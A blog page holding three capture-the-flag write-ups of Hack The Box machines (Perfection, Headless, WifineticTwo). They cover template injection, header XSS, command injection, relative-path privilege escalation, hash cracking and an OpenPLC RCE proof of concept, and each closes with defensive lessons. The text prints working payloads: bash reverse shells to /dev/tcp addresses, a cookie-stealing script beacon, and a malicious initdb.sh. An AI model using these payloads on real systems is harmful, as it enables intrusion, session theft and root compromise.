Ducksec

About Me

Hi! My name is Ducksec.

I'm a Pentester, Ethical Hacker, Security Consultant and animal lover with a passion for securing systems, networks and personal privacy. This blog is a place to post CTF writeups, tips and other articles which I hope will help others, just as many others have helped me.


15 years of experience in IT across a variety of verticals including Aviation and Healthcare - everything from Tier 1 Helpdesk to Sysadmin, Web Developer and now Security Testing and Consulting. About 70 industry certifications at this point, and always learning more.


Cat person. Continues to believe the Crows will win an AFL Grand Final (maybe not this year...).

HTB and other CTFs

Latest Writeups ( all )

  • Writeups

    Perfection is an easy Linux box from Hack The Box which showcases a server-side template injection (SSTI) vulnerability and gives us an opportunity to play around with hashcat’s lesser-used brute-force mode. Let’s go!

    Gaining user access

    We’ll fire off nmap, and as is often the case we have SSH and a web app on port 80.
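
    The exact flags aren't captured in the output below, but a typical first pass would be something along these lines (default scripts plus service/version detection, with the results saved for later reference):

    # -sC: default scripts, -sV: service/version detection, -oN: save normal output
    nmap -sC -sV -oN perfection.nmap 10.10.11.253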

    Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-16 03:42 EDT
    Nmap scan report for 10.10.11.253
    Host is up (0.47s latency).
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 256 80e479e85928df952dad574a4604ea70 (ECDSA)
    |_ 256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
    80/tcp open http nginx
    |_http-title: Weighted Grade Calculator
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Nmap done: 1 IP address (1 host up) scanned in 15.85 seconds
    

    Taking a look at the website, it seems to be a fairly standard site which offers some sort of weighted grade calculation.


    We can throw some values in and get a response - nothing unusual. There’s also some information about the site author suggesting she might not be the best at secure coding, but this is HTB, we already knew that! Of course, in real life, never advertise something like that - it’s asking for trouble!


    The most interesting piece of information, which jumps right out, is the version powering the site - apparently it’s “WEBrick 1.7.0”.

    Let’s use whatweb to get some more information:

    WhatWeb report for http://perfection.htb:80 
    Status   : 200 OK 
    Title   : Weighted Grade Calculator 
    IP     : 10.129.229.121 
    Country  : RESERVED, ZZ 
    
    Summary  : HTTPServer[nginx, WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)], PoweredBy[WEBrick], Ruby[3.0.2], Script, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-P
    rotection[1; mode=block]
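
    For reference, the report above comes from an invocation along these lines (from memory, the -v flag is what gives the longer report format):

    whatweb -v http://perfection.htb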
    

    Given a definite version number it’s always worth checking for an exploit, but I can’t immediately see anything which makes this version vulnerable, so let’s move on and test the site functionality a bit more.

    A bit more enumeration doesn’t suggest any obvious way forward, so I decide to focus on what we do know - the site is powered by Ruby, which means there’s a good chance some sort of template engine is used to render the HTML pages we’re seeing. It’s also quite likely that there’s some live processing of the submitted values and, if those values are being passed to a script (for example), we might be able to try command injection. Using burpsuite, we’ll try some generic command injection first - and learn that it looks as if there is some form of input filtering in place.


    Although this is blocked, we’ve moved forward - we can try to inject here, but to have any success the filtering is going to need to be bypassed. To explore this, we’ll use burpsuite’s Intruder tool:


    We’ll send a request to Intruder and set an injection point, then add a payload list and fire them off:


    The vast majority of requests return a response with a length of 5519, which corresponds to the same error page we saw earlier - therefore, we’re interested in any payload that returns a different length. Eventually we do get one:


    No error this time, and since this also happens to be a ping payload, let’s throw in our address, fire it off and listen with tcpdump to see if anything comes back:

    
    └──╼ $ sudo tcpdump -i tun0
    tcpdump: verbose output suppressed, use -v[v]... for full protocol decode 
    listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 
    09:53:27.946967 IP 10.10.14.23.38860 > perfection.htb.http: Flags [S], seq 1771576315, win 64240, options [mss 1460,sackOK,TS val 2802174436 ecr 0,nop,wscale 7], length 0 
    09:53:27.971028 IP perfection.htb.http > 10.10.14.23.38860: Flags [S.], seq 1346762632, ack 1771576316, win 65160, options [mss 1340,sackOK,TS val 1614309724 ecr 2802174436,nop,wscale 7], 
    length 0 
    09:53:27.971064 IP 10.10.14.23.38860 > perfection.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 2802174460 ecr 1614309724], length 0 
    09:53:27.971210 IP 10.10.14.23.38860 > perfection.htb.http: Flags [P.], seq 1:735, ack 1, win 502, options [nop,nop,TS val 2802174460 ecr 1614309724], length 734: HTTP: POST /weighted-grad
    e-calc HTTP/1.1 
    09:53:28.006542 IP perfection.htb.http > 10.10.14.23.38860: Flags [.], ack 735, win 504, options [nop,nop,TS val 1614309758 ecr 2802174460], length 0 
    09:53:28.014584 IP perfection.htb.http > 10.10.14.23.38860: Flags [.], seq 1:1329, ack 735, win 504, options [nop,nop,TS val 1614309765 ecr 2802174460], length 1328: HTTP: HTTP/1.1 200 OK 
    09:53:28.014602 IP 10.10.14.23.38860 > perfection.htb.http: Flags [.], ack 1329, win 501, options [nop,nop,TS val 2802174503 ecr 1614309765], length 0 
    09:53:28.014616 IP perfection.htb.http > 10.10.14.23.38860: Flags [P.], seq 1329:1984, ack 735, win 504, options [nop,nop,TS val 1614309765 ecr 2802174460], length 655: HTTP 
    09:53:28.014623 IP 10.10.14.23.38860 > perfection.htb.http: Flags [.], ack 1984, win 496, options [nop,nop,TS val 2802174503 ecr 1614309765], length 0 
    09:53:28.014857 IP perfection.htb.http > 10.10.14.23.38860: Flags [F.], seq 1984, ack 735, win 504, options [nop,nop,TS val 1614309765 ecr 2802174460], length 0 
    09:53:28.014897 IP 10.10.14.23.38860 > perfection.htb.http: Flags [F.], seq 735, ack 1985, win 501, options [nop,nop,TS val 2802174504 ecr 1614309765], length 0 
    09:53:28.041965 IP perfection.htb.http > 10.10.14.23.38860: Flags [.], ack 736, win 504, options [nop,nop,TS val 1614309794 ecr 2802174504], length 0 
    09:53:41.535593 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:53:42.537585 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:53:43.538819 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:53:44.540648 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:55:41.537187 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168 
    09:55:42.538724 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168 
    09:55:43.540058 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168 
    09:55:44.541586 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168
    

    No luck - but we’re getting some interaction. We could probe further, but let’s first have a look at SSTI.

    Taking exactly the same approach, this time I’ll use an SSTI wordlist.


    This time, we get some interesting returns from payloads using the <%= %> format. In fact, the response “invalid query parameters” suggests that this payload tried to execute, but failed due to an incorrect encoding (which the error message is also kind enough to point out). Not having done a lot of templating in Ruby, I take to google and learn that <%= %> is the tag used for embedded Ruby (ERB) - a templating system in Ruby that allows embedding Ruby code within a text document, often used in web applications to generate dynamic content. After a bit of tweaking, I realise the issue with the payload is simply that we’re actually URL encoding too much of the payload with the default settings in intruder - only the key characters need to be encoded, so that this payload:

    %0a<%25%3d+7+*+7+%25>

    …works! No error any more, and no filtering - from here, we simply need to get something more useful out of the SSTI.
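
    If you haven’t met ERB before, a quick local test shows why that <%= %> payload evaluates - anything between the tags is run as Ruby and the result is written into the rendered output (this assumes ruby is installed on your attack box):

    # render a template containing attacker-style embedded Ruby - the expression is evaluated
    ruby -r erb -e 'puts ERB.new("Result: <%= 7 * 7 %>").result'
    # => Result: 49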


    One of the nice things about SSTI attacks is that once you know which template language you’re working with most of the best payloads tend to be well documented - in this case the easiest reverse shell payload for ERB is <%= IO.popen("bash -c 'bash -i >& /dev/tcp/10.10.14.23/7777 0>&1'").readlines() %>

    All we need to do is substitute this command, and catch the shell.

    susan@perfection:~/ruby_app$ whoami 
    whoami 
    susan
    


    Privilege escalation to root

    Now that we have access as Susan, I’ll grab the user flag and start thinking about how we next gain root access. Let’s start with sudo -l to see if we can run anything as root.

    susan@perfection:~$ sudo -l 
    sudo -l 
    sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper 
    sudo: a password is required 
    susan@perfection:~$ python3 -c "import pty; pty.spawn('/bin/bash')" 
    python3 -c "import pty; pty.spawn('/bin/bash')" 
    susan@perfection:~$ sudo -l  
    sudo -l  
    [sudo] password for susan: 
    

    We initially get an error because we don’t have a proper terminal session (which is easily fixed with python’s pty.spawn()), but apparently we’ll need Susan’s password to run sudo -l.

    So, let’s keep enumerating:

    Within Susan’s home directory, we find a directory labelled “Migration”, and its contents are certainly useful!

    susan@perfection:~/Migration$ ls -lah 
    ls -lah 
    total 16K 
    drwxr-xr-x 2 root  root  4.0K Oct 27  2023 . 
    drwxr-x--- 7 susan susan 4.0K Feb 26 09:41 .. 
    -rw-r--r-- 1 root  root  8.0K May 14  2023 pupilpath_credentials.db 
    susan@perfection:~/Migration$ cat pupilpath_credentials.db 
    cat pupilpath_credentials.db 
    ��^�ableusersusersCREATE TABLE users ( 
    id INTEGER PRIMARY KEY, 
    name TEXT, 
    password TEXT 
    a�\ 
    Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023fsusan@perfection:~/Migration$ 
    

    When we cat the file, we see what looks very much like a hash - could this be Susan’s password? Let’s copy it to a file and see if we can crack it with hashcat:

    hashcat -m 1400 ./hash /usr/share/wordlists/rockyou.txt gives nothing of use, but a bit more digging finds this clue in /var/mail/susan:

    susan@perfection:/var/mail$ cat susan 
    cat susan 
    Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students 
    
    in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is: 
    
    {firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000} 
    
    Note that all letters of the first name should be convered into lowercase. 
    
    Please hit me with updates on the migration when you can. I am currently registering our university with the platform. 
    
    - Tina, your delightful student
    

    Although this isn’t the key to the castle, it might as well be, because it lets us crack the hash. Let’s run hashcat again, but with a few flags:

    hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

    Here, -m 1400 is the type of hash we want to crack (SHA-256), -a 3 selects the mask (brute-force) attack mode, and susan_nasus_?d?d?d?d?d?d?d?d?d is the mask we need to try - susan forwards, susan backwards, and then ?d placeholders (hashcat’s built-in digit charset) for the digits of a number between 1 and 1,000,000,000.

    All hashcat needs to do here is increment the number each time and check the hash until we find one that matches. This takes a while, but we do, eventually, get the password.
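
    As a side note, the mask above only ever tries exactly nine digits. If you wanted to sweep shorter numbers as well, hashcat’s increment mode can step through mask lengths - a sketch, assuming I’m remembering the increment semantics correctly (each literal character of the susan_nasus_ prefix counts as one mask position, so the full mask is 21 positions long):

    # step from 13 mask positions (prefix + 1 digit) up to the full 21 (prefix + 9 digits)
    hashcat -m 1400 -a 3 --increment --increment-min 13 hash.txt 'susan_nasus_?d?d?d?d?d?d?d?d?d'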

    With the password in hand, we can run good old sudo -l again and this time it’s a winner - Susan can run any command on the box as root, so long as you have her password.

    Matching Defaults entries for susan on perfection: 
       env_reset, mail_badpass, 
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, 
       use_pty 
    
    User susan may run the following commands on perfection: 
       (ALL : ALL) ALL 
    susan@perfection:~/Migration$ sudo /root 
    sudo /root 
    sudo: /root: command not found 
    susan@perfection:~/Migration$ sudo cat /root/root.txt 
    


    Avoiding the Hack - Lessons learned

    Ok, that was a fun box! SSTI is a vulnerability to watch - as template frameworks have become more popular (and for good reason) exploits against them have become much more of an issue. Like any application, developers need to consider all untrusted data as a possible risk and put proper escaping in place. SSTI can be tricky to find, but exploit payloads are easy to come by once you know which language you’re dealing with.

    The best aspect of this box for me was the hash cracking - aside from getting to use a less-used brute-force feature of hashcat, there are some important takeaways from this part:

    • Don’t re-use passwords, ever.
    • Don’t store any sort of application backup unencrypted, stuff like this happens.
    • Using a name as part of a password is a bad idea, it’s guessable to start with, but also presents a false sense of security. Users think “no one will ever type my name backwards, ‘cause I’d never do that!” - hackers do what we just did. This sort of approach to passwords also leads to imbalanced outcomes based on the arbitrary length of your name - with the format used here, you’d end up with a much weaker password if your name was “Sam” than if your name was “Georgiana”. Your password is much less complex than you think if your name happens to be “Hannah”!
    • Random numbers make no sense as an aspect of a password when random letters, or better, the full alphanumeric spectrum, are an option - a quick back-of-the-envelope comparison below makes the point.
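
    To put rough numbers on that last bullet, compare the keyspace of nine random digits with nine random alphanumeric characters (bits of entropy = log2 of the keyspace; bc is just doing the arithmetic here):

    echo 'l(10^9)/l(2)' | bc -l    # nine random digits: ~29.9 bits
    echo 'l(62^9)/l(2)' | bc -l    # nine random alphanumerics: ~53.6 bits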

    The final issue here is password policy - every organisation should have a formal password policy with specifications on length, complexity and format - but (as this box shows) the policy itself should be treated as sensitive information. Knowing the required format really does make life easier for an attacker. At the same time, the policy must be accessible to users to be of any value. Clear document labelling and categorisation can go a long way here, employees need to be able to recognise a sensitive document (like a password policy) easily and know how they should treat it.

    See you in the next one! :)

  • Writeups

    Headless is an easy box from HackTheBox which is based around some common web security issues - although they’re in less obvious locations, which makes the box interesting. Let’s get started!

    Gaining user access

    As always, starting with an nmap scan is the way to go:

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
    | ssh-hostkey:
    |_ 256 2eb90824021b609460b384a99e1a60ca (ED25519)
    5000/tcp open upnp?
    | fingerprint-strings:
    | GetRequest:
    | HTTP/1.1 200 OK
    | Server: Werkzeug/2.2.2 Python/3.11.2
    | Date: Thu, 11 Jul 2024 11:14:39 GMT
    | Content-Type: text/html; charset=utf-8
    | Content-Length: 2799
    | Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
    | Connection: close
    <...SNIP...>
    | <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
    | </body>
    |_ </html>
    <...SNIP...>
    Nmap done: 1 IP address (1 host up) scanned in 221.45 seconds
    

    We have SSH, nothing especially interesting there, and Werkzeug, a Python-based web server, on port 5000.

    Let’s take a look at the site - it seems to be a “coming soon” page with a link to a support contact form. Since this is an HTB machine we know there’s going to be a route to exploitation somewhere, so of course this is worth checking out, but in the real world a “coming soon” page will often indicate that a site has been put together quite quickly - after all, it’s only going to be there for a while, right? This might mean there are some less-than-fantastic security choices at play too!

    Before we go any further, let’s fire off some directory busting in the background:

    ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FFUZ -u http://headless.htb:5000/FFUZ -ic

    Now let’s continue…


    As a good first step, we’ll try for XSS within this form - but the standard payload <script>alert(1)</script> throws an error. It looks like the developers are one step ahead on this one!


    So, I get nothing from adding this to any of the form fields - but that doesn’t mean we’re done. It’s easy (but dangerous) to forget that any HTTP request can be modified by an attacker with a proxy like burpsuite, and therefore we can also try to inject into HTTP headers themselves. I wonder if the developers have this covered too.

    I like to use the following payload for testing:

    <script>var i=new Image(); i.src="http://10.10.14.34/?cookie="+btoa(document.cookie);</script>
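
    For reference, a test like this can also be driven from the command line. Here’s a rough sketch of the request with the payload dropped into the User-Agent header - the form field names are just placeholders, so adjust them to whatever the intercepted request actually contains:

    curl -s 'http://headless.htb:5000/support' \
      -H 'User-Agent: <script>var i=new Image(); i.src="http://10.10.14.34/?cookie="+btoa(document.cookie);</script>' \
      --data 'fname=test&lname=test&email=test%40test.com&phone=0123456789&message=hello'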


    This time we do get a response back to my listening server, and we even appear to have a cookie!

    └──╼ $ sudo python3 -m http.server 80
    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 
    10.129.223.91 - - [27/May/2024 10:29:14] "GET /?cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA= HTTP/1.1" 200 - 
    ^C 
    Keyboard interrupt received, exiting.
    
    

    The cookie is base64 encoded, so let’s decode it:

    ┌─[✗]─[duck@Bippy]─[~/Boxes/htb/boxes/headless]
    └──╼ $ echo "aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=" | base64 -d
    is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
    
    

    Even better, this looks like an admin cookie!
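
    As an aside, the first dot-separated chunk of that value is itself just base64 (the part after the dot is a signature), so we can see exactly what it encodes:

    $ echo 'ImFkbWluIg==' | base64 -d
    "admin"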

    Meanwhile, Ffuf has found some pages, one of which is a dashboard:

    [Status: 200, Size: 2799, Words: 963, Lines: 96, Duration: 197ms]
     * FFUZ:
    [Status: 200, Size: 2363, Words: 836, Lines: 93, Duration: 322ms]
     * FFUZ: support
    [Status: 500, Size: 265,
    

    We can pass this back to the application in any number of ways, but I use a simple cookie jar extension for Firefox to edit cookies as required - do this whichever way you prefer. Now, using the admin cookie, we can view the admin dashboard:


    Note: When I completed this box the admin cookie was returned right away - other users suggest that several cookies should come back and that you might need to wait a while for the admin one to show up.

    We’re given a “generate report” button - and if we hit it, we get a message back saying “systems are up and running” - I wonder what’s going on in the background…

    It’s possible that there’s a well-written script performing some checks behind the scenes and returning a pre-defined value, but it’s also possible that some command is just being invoked and the response we’re getting here is keyed off the return code. If the latter, we might well be able to inject a command of our own here.

    This is easy to test - I add a &whoami and check that the command still runs:


    …and it does.

    Nothing bubbles up to the user interface, but since nothing broke it’s reasonable to assume that our code did execute - so, let’s move on and see if we can get a ping back from the target system - we’ll start tcpdump and then add a ping command to our injection point.

    └──╼ $ sudo tcpdump -i tun0
    tcpdump: verbose output suppressed, use -v[v]... for full protocol decode 
    listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 
    10:37:32.594429 IP 10.10.14.34.54272 > headless.htb.5000: Flags [S], seq 2925004892, win 64240, options [mss 1460,sackOK,TS val 4131278173 ecr 0,nop,wscale 7], length 0 
    10:37:32.620299 IP headless.htb.5000 > 10.10.14.34.54272: Flags [S.], seq 545506689, ack 2925004893, win 65160, options [mss 1340,sackOK,TS val 4290847119 ecr 4131278173,nop,wscale 7], len
    gth 0 
    
    <SNIP>
    
    10:38:44.962061 IP headless.htb.5000 > 10.10.14.34.57410: Flags [S.], seq 3408962217, ack 3843608213, win 65160, options [mss 1340,sackOK,TS val 4290919448 ecr 4131350499,nop,wscale 7], le
    ngth 0 
    10:38:44.962088 IP 10.10.14.34.57410 > headless.htb.5000: Flags [.], ack 1, win 502, options [nop,nop,TS val 4131350540 ecr 4290919448], length 0 
    10:38:44.962173 IP 10.10.14.34.57410 > headless.htb.5000: Flags [P.], seq 1:600, ack 1, win 502, options [nop,nop,TS val 4131350541 ecr 4290919448], length 599 
    10:38:44.990350 IP headless.htb.5000 > 10.10.14.34.57410: Flags [.], ack 600, win 505, options [nop,nop,TS val 4290919494 ecr 4131350541], length 0 
    10:38:45.005933 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 1, length 64 
    10:38:45.005982 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 1, length 64 
    10:38:46.081076 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 2, length 64 
    10:38:46.081137 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 2, length 64 
    10:38:47.210193 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 3, length 64 
    10:38:47.210275 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 3, length 64 
    10:38:48.031599 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 4, length 64 
    10:38:48.031624 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 4, length 64 
    10:38:49.050602 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 5, length 64 
    10:38:49.050674 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 5, length 64 
    10:38:50.006705 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 6, length 64 
    10:38:50.006769 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 6, length 64 
    10:38:51.106004 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 7, length 64 
    10:38:51.106070 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 7, length 64 
    10:38:52.023103 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 8, length 64 
    10:38:52.023168 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 8, length 64 
    10:38:53.046498 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 9, length 64 
    10:38:53.046559 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 9, length 64 
    10:38:54.081637 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 10, length 64 
    10:38:54.081708 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 10, length 64 
    10:38:55.092278 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 11, length 64 
    10:38:55.092348 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 11, length 64
    


    There you go - ICMP echo requests, our ping command worked! We can now inject commands and make the box initiate a connection, and from here we can get a shell quite easily. I encode a basic bash reverse shell in base64, then pass this to base64 -d and finally to bash, which executes it. This isn’t much more complicated than a standard payload but cuts out a lot of possible messing around with escaping.
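
    Building the payload locally looks something like this - the IP and port belong to my listener, and the exact separator used at the injection point (here a ;) depends on how the parameter is parsed:

    # encode the reverse shell so no quotes or redirects need escaping inside the request
    PAYLOAD=$(echo 'bash -i >& /dev/tcp/10.10.14.34/7777 0>&1' | base64 -w0)
    echo ";echo ${PAYLOAD}|base64 -d|bash"    # this string goes into the injection point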


    We’ll start a listening server… and we’re in!

    └──╼ $ nc -nvlp 7777
    listening on [any] 7777 ... 
    connect to [10.10.14.34] from (UNKNOWN) [10.129.223.91] 60562 
    bash: cannot set terminal process group (1166): Inappropriate ioctl for device 
    bash: no job control in this shell 
    dvir@headless:~/app$ whoami 
    whoami 
    dvir 
    dvir@headless:~/app$ 
    


    Privilege escalation to root

    As always in a Linux environment, start with good old sudo -l - who knows, we might just be able to sudo su and be done with it…

    dvir@headless:~$ sudo -l 
    sudo -l 
    Matching Defaults entries for dvir on headless: 
       env_reset, mail_badpass, 
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, 
       use_pty 
    User dvir may run the following commands on headless: 
       (ALL) NOPASSWD: /usr/bin/syscheck
    

    Well, no sudo su but we can run whatever syscheck is as root - and I’m willing to bet it’s a bash script which is what the “Generate report” button is actually invoking.

    A quick file command confirms that syscheck is a custom bash script:

    dvir@headless:~$ file /usr/bin/syscheck 
    file /usr/bin/syscheck 
    /usr/bin/syscheck: Bourne-Again shell script, ASCII text executable
    

    Let’s look at the script then :)

    #!/bin/bash
    
    if [ "$EUID" -ne 0 ]; then 
      exit 1 
    fi 
    
    last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1) 
    formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M") 
    /usr/bin/echo "Last Kernel Modification Time: $formatted_time" 
    
    disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}') 
    /usr/bin/echo "Available disk space: $disk_space" 
    
    load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}') 
    /usr/bin/echo "System load average: $load_average" 
    
    if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then 
      /usr/bin/echo "Database service is not running. Starting it..." 
      ./initdb.sh 2>/dev/null 
    else 
      /usr/bin/echo "Database service is running." 
    fi 
    
    exit 0
    
    

    The script first verifies that it is running with root privileges. It then retrieves the last modification time of the kernel, the available disk space, and the system load average - not too interesting. Finally, however, it checks whether the “initdb.sh” process is running, and if not, it starts the database service - since the script runs as root, “initdb.sh” will also be run as root.

    As it stands, initdb.sh isn’t running - and given that syscheck lives in /usr/bin, you might expect to find initdb.sh alongside it. It isn’t there:

    dvir@headless:~$ /usr/bin/pgrep -x "initdb.sh" 
    /usr/bin/pgrep -x "initdb.sh" 
    
    dvir@headless:~$ ls /usr/bin | grep init 
    ls /usr/bin | grep init 
    lsinitramfs 
    unmkinitramfs 
    xinit
    

    So, this means any script called “initdb.sh” that we placed in /usr/bin would, in theory, be run as root. Unfortunately, we don’t have permission to write to /usr/bin/ - but do we need it?

    There’s a potential vulnerability in using relative paths in bash scripts which comes into play here. Specifically, using a relative path for initdb.sh can be problematic if the script is executed from a different directory than intended. Let’s say I run the script from /tmp - now the path referenced by ./initdb.sh isn’t /usr/bin/initdb.sh, but rather /tmp/initdb.sh (don’t forget that ./ just means “in the current directory”). Therefore, if an attacker places a malicious initdb.sh in the working directory, it could be executed instead of the intended script. And that’s exactly what we’ll do to root this box. We’ll simply add a basic reverse shell to a bash script in a directory we can write to (/tmp), call it “initdb.sh”, make it executable, and then run the syscheck script as root from that location:

    dvir@headless:/tmp$ echo "/bin/bash -i >& /dev/tcp/10.10.14.34/7778 0>&1" > initdb.sh 
    
    dvir@headless:/tmp$ cat initdb.sh 
    
    /bin/bash -i >& /dev/tcp/10.10.14.34/7778 0>&1 
    
    dvir@headless:/tmp$ chmod +x initdb.sh 
    
    dvir@headless:/tmp$ sudo /usr/bin/syscheck 
    sudo /usr/bin/syscheck 
    Last Kernel Modification Time: 01/02/2024 10:05 
    Available disk space: 2.0G 
    System load average:  0.04, 0.01, 0.00 
    Database service is not running. Starting it...
    
    
    

    And back on my attack box, we catch the shell:

    root@headless:/tmp# whoami 
    whoami 
    root 
    root@headless:/tmp# cat /root/root.txt 
    cat /root/root.txt 
    

    …and we’re done!

    Avoiding the Hack - Lessons learned

    So let’s now take a look at the vulnerabilities we found, and how they could have been avoided.

    This was a fairly typical web app sort of box - the first vulnerability wasn’t unusual, but it is a good reminder that just because a user isn’t supposed to tamper with HTTP headers, that doesn’t mean they can’t. Never forget that malicious actors don’t tend to do what they’re supposed to do!

    The second issue is a specific point for anyone who works with Linux: think very carefully about the use of relative paths. Sometimes you do need to use them, and sometimes using them is much more sensible than choosing absolute paths and having to do a bunch of re-writes at some point (e.g. in a web app), but if you don’t really need them it’s best to pin things down and give an absolute path.
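
    For example, one common defensive pattern is to resolve helper scripts relative to the calling script’s own location rather than whatever directory the caller happens to be sitting in - a minimal sketch of how syscheck could have done it:

    #!/bin/bash
    # resolve the directory this script lives in, then call the helper by absolute path
    script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
    "${script_dir}/initdb.sh" 2>/dev/null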

    See you in the next one!

  • Writeups

    Jul 07, 2024 by Ducksec

    WiFineticTwo Writeup

    WifineticTwo is a medium-difficulty Linux machine that features vulnerabilities in OpenPLC and a WPS attack, which is especially interesting for an HTB machine! Let’s dive in!

    Gaining user access

    Since this box is based more around a hardware scenario, we (unusually for HTB) don’t find anything on port 80 - so let’s fire off a quick nmap scan to see what else exists!

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux;
    protocol 2.0)
    | ssh-hostkey:
    | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
    | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
    |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
    8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
    | http-title: Site doesn't have a title (text/html; charset=utf-8).
    |_Requested resource was http://10.10.11.7:8080/login
    <...SNIP...>
    

    Well, there’s not too much here, but we do find a web server on 8080 - it’s Werkzeug, which tells us Python, but not much else. Cue some visual inspection, and I find that OpenPLC is running here.


    OpenPLC is an exciting open-source project which allows you to program and control industrial equipment, like PLCs (Programmable Logic Controllers), using a simple and intuitive interface. In theory this is great - reducing barriers to entry in industries which are generally closed-source dominated can be highly beneficial - OpenPLC for example, makes it easy to create custom automation solutions that streamline processes and boost productivity without building a solution from scratch. At the same time, the guys over in industrial automation aren’t always security focused, and, as a result…


    Yes, I’m afraid that, just like that (courtesy of the default openplc:openplc credentials), we are in! From a security perspective this is already a disaster - the default user has rights to run programs and upload new ones, so can we write one which will give us a shell…


    In fact, this time around we don’t even need to, because Fellipe Oliveira found the vulnerability (CVE-2021-31630) and thewhiteh4t has already done a great job with a PoC: https://github.com/thewhiteh4t/cve-2021-31630

    --- CVE-2021-31630 ----------------------------- 
    --- OpenPLC WebServer v3 - Authenticated RCE --- 
    ------------------------------------------------
    
    [>] Found By : Fellipe Oliveira 
    [>] PoC By  : thewhiteh4t [ https://twitter.com/thewhiteh4t ] 
    
    [>] Target  : http://10.129.223.213:8080 
    [>] Username : openplc 
    [>] Password : openplc 
    [>] Timeout  : 20 secs 
    [>] LHOST   : 10.10.14.34 
    [>] LPORT   : 7777 
    
    [!] Checking status... 
    [+] Service is Online! 
    [!] Logging in... 
    [+] Logged in! 
    [!] Restoring default program... 
    [+] PLC Stopped! 
    [+] Cleanup successful! 
    [!] Uploading payload... 
    [+] Payload uploaded! 
    [+] Waiting for 5 seconds... 
    [+] Compilation successful! 
    [!] Starting PLC...
    
    
    
    └──╼ $ nc -nvlp 7777
    listening on [any] 7777 ... 
    connect to [10.10.14.34] from (UNKNOWN) [10.129.223.213] 40344 
    bash: cannot set terminal process group (177): Inappropriate ioctl for device 
    bash: no job control in this shell 
